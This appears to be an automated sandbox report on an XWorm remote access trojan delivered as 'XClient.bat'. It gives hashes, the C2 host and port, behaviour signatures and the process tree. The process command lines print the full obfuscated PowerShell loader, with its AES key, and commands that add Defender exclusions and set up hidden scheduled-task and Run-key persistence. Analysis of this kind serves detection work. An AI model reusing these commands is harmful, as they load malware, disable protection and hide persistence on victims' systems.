Analysis
- max time kernel: 148s
- max time network: 150s
- platform: windows11-21h2_x64
- resource: win11-20240508-en
- resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 31-05-2024 11:46
- Static task: static1
- Behavioral task: behavioral1
- Sample: XClient.bat
- Resource: win11-20240508-en
General
- Target: XClient.bat
- Size: 306KB
- MD5: 5f114fbb47589f072b2329adeab0e2d7
- SHA1: 1572da87baa2fcd945be9ca5073cf2c27a5e4eda
- SHA256: 976bef5e2f4128e42bb344af988b88e188503c4f7df7452ee1a87947eea833a1
- SHA512: 4ffba8c4bc5771f90b64825880e033192bbafdf1952a29893d35821dbe675fc57b942ff22831848e3081da751804572f61b214cdc8b2a42523d069343f112b69
- SSDEEP: 6144:rCIqB5Xma5qnV7R+N8ymXO55y6wXYjuvgfazxjjNzMGryBNYqi/v:rJqnheT68ym6vfazxDyBiX
Malware Config
Extracted
- Family: xworm
- C2: 19.ip.gl.ply.gg:38173
- Install_directory: %Userprofile%
- install_file: Runtime Broker.exe
Signatures
- Detect Xworm Payload (1 IoC)
  Processes (resource | yara_rule):
    behavioral1/memory/1028-48-0x00000211B10D0000-0x00000211B10EC000-memory.dmp | family_xworm
- Blocklisted process makes network request (1 IoC)
  Processes (flow | pid | process):
    2 | 1028 | powershell.exe
- Command and Scripting Interpreter: PowerShell (1 TTP, 7 IoCs)
  Run Powershell and hide display window.
  Processes (pid | process):
    1028 | powershell.exe
    1784 | powershell.exe
    2176 | powershell.exe
    4204 | powershell.exe
    1684 | powershell.exe
    2424 | powershell.exe
    776 | powershell.exe
- Drops startup file (2 IoCs)
  Processes (description | ioc | process):
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | powershell.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | powershell.exe
- Executes dropped EXE (1 IoC)
  Processes (pid | process):
    4908 | Runtime Broker.exe
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes (description | ioc | process):
    Set value (str) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Admin\\Runtime Broker.exe" | powershell.exe
- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes (flow | ioc):
    1 | ip-api.com
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Modifies registry class (1 IoC)
  Processes (description | ioc | process):
    Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings | powershell.exe
- Suspicious behavior: EnumeratesProcesses (17 IoCs)
  Processes (pid | process):
    1784 | powershell.exe
    1784 | powershell.exe
    2176 | powershell.exe
    2176 | powershell.exe
    1028 | powershell.exe
    1028 | powershell.exe
    4204 | powershell.exe
    4204 | powershell.exe
    1684 | powershell.exe
    1684 | powershell.exe
    2424 | powershell.exe
    2424 | powershell.exe
    776 | powershell.exe
    776 | powershell.exe
    1028 | powershell.exe
    4908 | Runtime Broker.exe
    4908 | Runtime Broker.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (description | pid | process):
    Token: SeDebugPrivilege | 1784 | powershell.exe
    Token: SeDebugPrivilege | 2176 | powershell.exe
    Token: SeIncreaseQuotaPrivilege | 2176 | powershell.exe
    Token: SeSecurityPrivilege | 2176 | powershell.exe
    Token: SeTakeOwnershipPrivilege | 2176 | powershell.exe
    Token: SeLoadDriverPrivilege | 2176 | powershell.exe
    Token: SeSystemProfilePrivilege | 2176 | powershell.exe
    Token: SeSystemtimePrivilege | 2176 | powershell.exe
    Token: SeProfSingleProcessPrivilege | 2176 | powershell.exe
    Token: SeIncBasePriorityPrivilege | 2176 | powershell.exe
    Token: SeCreatePagefilePrivilege | 2176 | powershell.exe
    Token: SeBackupPrivilege | 2176 | powershell.exe
    Token: SeRestorePrivilege | 2176 | powershell.exe
    Token: SeShutdownPrivilege | 2176 | powershell.exe
    Token: SeDebugPrivilege | 2176 | powershell.exe
    Token: SeSystemEnvironmentPrivilege | 2176 | powershell.exe
    Token: SeRemoteShutdownPrivilege | 2176 | powershell.exe
    Token: SeUndockPrivilege | 2176 | powershell.exe
    Token: SeManageVolumePrivilege | 2176 | powershell.exe
    Token: 33 | 2176 | powershell.exe
    Token: 34 | 2176 | powershell.exe
    Token: 35 | 2176 | powershell.exe
    Token: 36 | 2176 | powershell.exe
    Token: SeIncreaseQuotaPrivilege | 2176 | powershell.exe
    Token: SeSecurityPrivilege | 2176 | powershell.exe
    Token: SeTakeOwnershipPrivilege | 2176 | powershell.exe
    Token: SeLoadDriverPrivilege | 2176 | powershell.exe
    Token: SeSystemProfilePrivilege | 2176 | powershell.exe
    Token: SeSystemtimePrivilege | 2176 | powershell.exe
    Token: SeProfSingleProcessPrivilege | 2176 | powershell.exe
    Token: SeIncBasePriorityPrivilege | 2176 | powershell.exe
    Token: SeCreatePagefilePrivilege | 2176 | powershell.exe
    Token: SeBackupPrivilege | 2176 | powershell.exe
    Token: SeRestorePrivilege | 2176 | powershell.exe
    Token: SeShutdownPrivilege | 2176 | powershell.exe
    Token: SeDebugPrivilege | 2176 | powershell.exe
    Token: SeSystemEnvironmentPrivilege | 2176 | powershell.exe
    Token: SeRemoteShutdownPrivilege | 2176 | powershell.exe
    Token: SeUndockPrivilege | 2176 | powershell.exe
    Token: SeManageVolumePrivilege | 2176 | powershell.exe
    Token: 33 | 2176 | powershell.exe
    Token: 34 | 2176 | powershell.exe
    Token: 35 | 2176 | powershell.exe
    Token: 36 | 2176 | powershell.exe
    Token: SeIncreaseQuotaPrivilege | 2176 | powershell.exe
    Token: SeSecurityPrivilege | 2176 | powershell.exe
    Token: SeTakeOwnershipPrivilege | 2176 | powershell.exe
    Token: SeLoadDriverPrivilege | 2176 | powershell.exe
    Token: SeSystemProfilePrivilege | 2176 | powershell.exe
    Token: SeSystemtimePrivilege | 2176 | powershell.exe
    Token: SeProfSingleProcessPrivilege | 2176 | powershell.exe
    Token: SeIncBasePriorityPrivilege | 2176 | powershell.exe
    Token: SeCreatePagefilePrivilege | 2176 | powershell.exe
    Token: SeBackupPrivilege | 2176 | powershell.exe
    Token: SeRestorePrivilege | 2176 | powershell.exe
    Token: SeShutdownPrivilege | 2176 | powershell.exe
    Token: SeDebugPrivilege | 2176 | powershell.exe
    Token: SeSystemEnvironmentPrivilege | 2176 | powershell.exe
    Token: SeRemoteShutdownPrivilege | 2176 | powershell.exe
    Token: SeUndockPrivilege | 2176 | powershell.exe
    Token: SeManageVolumePrivilege | 2176 | powershell.exe
    Token: 33 | 2176 | powershell.exe
    Token: 34 | 2176 | powershell.exe
    Token: 35 | 2176 | powershell.exe
- Suspicious use of SetWindowsHookEx (1 IoC)
  Processes (pid | process):
    1028 | powershell.exe
- Suspicious use of WriteProcessMemory (20 IoCs)
  Processes (description | pid | process | target process):
    PID 1932 wrote to memory of 1784 | 1932 | cmd.exe | powershell.exe
    PID 1932 wrote to memory of 1784 | 1932 | cmd.exe | powershell.exe
    PID 1784 wrote to memory of 2176 | 1784 | powershell.exe | powershell.exe
    PID 1784 wrote to memory of 2176 | 1784 | powershell.exe | powershell.exe
    PID 1784 wrote to memory of 3536 | 1784 | powershell.exe | WScript.exe
    PID 1784 wrote to memory of 3536 | 1784 | powershell.exe | WScript.exe
    PID 3536 wrote to memory of 4688 | 3536 | WScript.exe | cmd.exe
    PID 3536 wrote to memory of 4688 | 3536 | WScript.exe | cmd.exe
    PID 4688 wrote to memory of 1028 | 4688 | cmd.exe | powershell.exe
    PID 4688 wrote to memory of 1028 | 4688 | cmd.exe | powershell.exe
    PID 1028 wrote to memory of 4204 | 1028 | powershell.exe | powershell.exe
    PID 1028 wrote to memory of 4204 | 1028 | powershell.exe | powershell.exe
    PID 1028 wrote to memory of 1684 | 1028 | powershell.exe | powershell.exe
    PID 1028 wrote to memory of 1684 | 1028 | powershell.exe | powershell.exe
    PID 1028 wrote to memory of 2424 | 1028 | powershell.exe | powershell.exe
    PID 1028 wrote to memory of 2424 | 1028 | powershell.exe | powershell.exe
    PID 1028 wrote to memory of 776 | 1028 | powershell.exe | powershell.exe
    PID 1028 wrote to memory of 776 | 1028 | powershell.exe | powershell.exe
    PID 1028 wrote to memory of 3240 | 1028 | powershell.exe | schtasks.exe
    PID 1028 wrote to memory of 3240 | 1028 | powershell.exe | schtasks.exe
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
(depth 1) C:\Windows\system32\cmd.exe, PID 1932
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"
  - Suspicious use of WriteProcessMemory
  (depth 2) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, PID 1784
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W9ISWKk0uktoB21K/n8WP2z/EMIVG4ajR8KxvaCHQZc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NiPaOPsEhb3GYyQq1AToPQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TYqPW=New-Object System.IO.MemoryStream(,$param_var); $wUcjc=New-Object System.IO.MemoryStream; $lqjaM=New-Object System.IO.Compression.GZipStream($TYqPW, [IO.Compression.CompressionMode]::Decompress); $lqjaM.CopyTo($wUcjc); $lqjaM.Dispose(); $TYqPW.Dispose(); $wUcjc.Dispose(); $wUcjc.ToArray();}function execute_function($param_var,$param2_var){ $zoSsA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VRasO=$zoSsA.EntryPoint; $VRasO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$qsbcF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($jzVlk in $qsbcF) { if ($jzVlk.StartsWith(':: ')) { $ZvyRr=$jzVlk.Substring(3); break; }}$payloads_var=[string[]]$ZvyRr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    (depth 3) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, PID 2176
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_476_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_476.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    (depth 3) C:\Windows\System32\WScript.exe, PID 3536
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_476.vbs"
      - Suspicious use of WriteProcessMemory
      (depth 4) C:\Windows\system32\cmd.exe, PID 4688
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_476.bat" "
        - Suspicious use of WriteProcessMemory
        (depth 5) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, PID 1028
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W9ISWKk0uktoB21K/n8WP2z/EMIVG4ajR8KxvaCHQZc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NiPaOPsEhb3GYyQq1AToPQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TYqPW=New-Object System.IO.MemoryStream(,$param_var); $wUcjc=New-Object System.IO.MemoryStream; $lqjaM=New-Object System.IO.Compression.GZipStream($TYqPW, [IO.Compression.CompressionMode]::Decompress); $lqjaM.CopyTo($wUcjc); $lqjaM.Dispose(); $TYqPW.Dispose(); $wUcjc.Dispose(); $wUcjc.ToArray();}function execute_function($param_var,$param2_var){ $zoSsA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VRasO=$zoSsA.EntryPoint; $VRasO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_476.bat';$qsbcF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_476.bat').Split([Environment]::NewLine);foreach ($jzVlk in $qsbcF) { if ($jzVlk.StartsWith(':: ')) { $ZvyRr=$jzVlk.Substring(3); break; }}$payloads_var=[string[]]$ZvyRr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Drops startup file
          - Adds Run key to start application
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
          (depth 6) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, PID 4204
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
          (depth 6) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, PID 1684
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
          (depth 6) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, PID 2424
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
          (depth 6) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, PID 776
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
          (depth 6) C:\Windows\System32\schtasks.exe, PID 3240
            Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"
            - Creates scheduled task(s)
(depth 1) C:\Users\Admin\Runtime Broker.exe, PID 4908
  Command line: "C:\Users\Admin\Runtime Broker.exe"
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3KB
  MD5: df472dcddb36aa24247f8c8d8a517bd7
  SHA1: 6f54967355e507294cbc86662a6fbeedac9d7030
  SHA256: e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
  SHA512: 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
- Filesize: 1KB
  MD5: eb15ee5741b379245ca8549cb0d4ecf8
  SHA1: 3555273945abda3402674aea7a4bff65eb71a783
  SHA256: b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
  SHA512: 1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
- Filesize: 944B
  MD5: d0a4a3b9a52b8fe3b019f6cd0ef3dad6
  SHA1: fed70ce7834c3b97edbd078eccda1e5effa527cd
  SHA256: 21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31
  SHA512: 1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b
- Filesize: 944B
  MD5: e8a7ab7bae6a69946da69507ee7ae7b0
  SHA1: b367c72fa4948493819e1c32c32239aa6e78c252
  SHA256: cd5480d72c1a359e83f7d6b6d7d21e1be2463f2c6718385cc6c393c88323b272
  SHA512: 89b22519bc3986be52801397e6eff4550621b4804abd2d04f431c9b2591ba8e3eab2625490a56ebb947ba3b122b6186badb6c461e917b69d7e13644c86a6f683
- Filesize: 944B
  MD5: 4914eb0b2ff51bfa48484b5cc8454218
  SHA1: 6a7c3e36ce53b42497884d4c4a3bda438dd4374b
  SHA256: 7e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e
  SHA512: 83ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 306KB
  MD5: 5f114fbb47589f072b2329adeab0e2d7
  SHA1: 1572da87baa2fcd945be9ca5073cf2c27a5e4eda
  SHA256: 976bef5e2f4128e42bb344af988b88e188503c4f7df7452ee1a87947eea833a1
  SHA512: 4ffba8c4bc5771f90b64825880e033192bbafdf1952a29893d35821dbe675fc57b942ff22831848e3081da751804572f61b214cdc8b2a42523d069343f112b69
- Filesize: 115B
  MD5: 86722163faccab24931ccf4edac53f1e
  SHA1: f5d2754468b5abb0fcdeba18a9ee0760b2bf8f39
  SHA256: 616b6d73324d3bc1a1f0147f2381b7c75dfa8868f6ee8da518dbece692420991
  SHA512: 6267133dd0d085613222fa6c225761077117adf0a61978580111d219397b8e35c9f9b6971e33da7e67bf023bd080b2ca80bcdbdfbfa74c52789b31bd9e7aede4
- Filesize: 440KB
  MD5: 0e9ccd796e251916133392539572a374
  SHA1: eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
  SHA256: c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
  SHA512: e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d